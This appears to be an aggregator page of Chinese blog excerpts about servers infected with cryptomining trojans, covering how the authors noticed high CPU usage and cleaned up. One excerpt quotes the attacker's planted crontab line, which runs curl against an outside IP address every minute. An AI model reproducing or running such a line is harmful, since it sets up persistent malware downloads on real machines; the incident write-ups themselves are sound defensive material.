最近emr集群跑任務的時候總出現 task failed ，優化sql，調提交任務參數都沒解決，最后再我排查時候，發現一個從節點的cpu使用800% 經過一些列排查，發現是被注入木馬了， #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...

線上服務器用的是某訊雲的，歡快的完美運行着Tomcat，MySQL，MongoDB，ActiveMQ等程序。突然一則噩耗從前線傳來：網站不能訪問了。 此項目是我負責，我以150+的手速立即打開了服務器，看到Tomcat掛了，然后順其自然的重啟，啟動過程中直接被killed，再試試數據庫，同樣 ...

背景 最近由於在弄springboot shiro的redis session共享的問題，所以在服務器上部署了redis，因為沒有太多的考慮所以沒有設置密碼。 等到第二天的時候，發現redis外網無法訪問內網可以。 查看端口綁定情況 netstat -antlp | grep 6379 ...

上個月末，我也嘗試到了服務器被病毒入侵的滋味，正好這個月末來復盤一下。 怎么說呢，那個感覺就像是你自己的娃在外面被揍了一樣，你得想辦法為孩子出人頭地呀，是吧。於是這一波病毒反擊戰就正式上演了。 ## 一出好戲 先說一下我是怎么發現服務器被入侵的。那是在一個愉快的下班時間，我的手機端又提示收到了阿里 ...

記一次服務器被植入挖礦腳本的解決過程 刪除挖礦腳本和對應的進程 找出並刪除對應挖礦腳本文件 找出進程pid，並且kill掉 無法kill掉的是原進程的守護進程，原進程不在它也會自動關閉，所以不用管它 kill掉后cpu恢復正常 需要檢查是否有定時任務 防止挖礦腳本重新 ...

服務器被植入挖礦，剛解決完，參考文章！ 上午重啟服務的時候，發現程序啟動死慢，用top命令查看了一下，cpu被占用接近100%，所以無法運行新程序，通過top命令然后輸入P，就能看到有兩個程序幾乎占用了所有的CPU，占用率為700%左右，程序名稱為：minerd和AnXqV兩個，通過搜索知道 ...

一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內網滲透 ...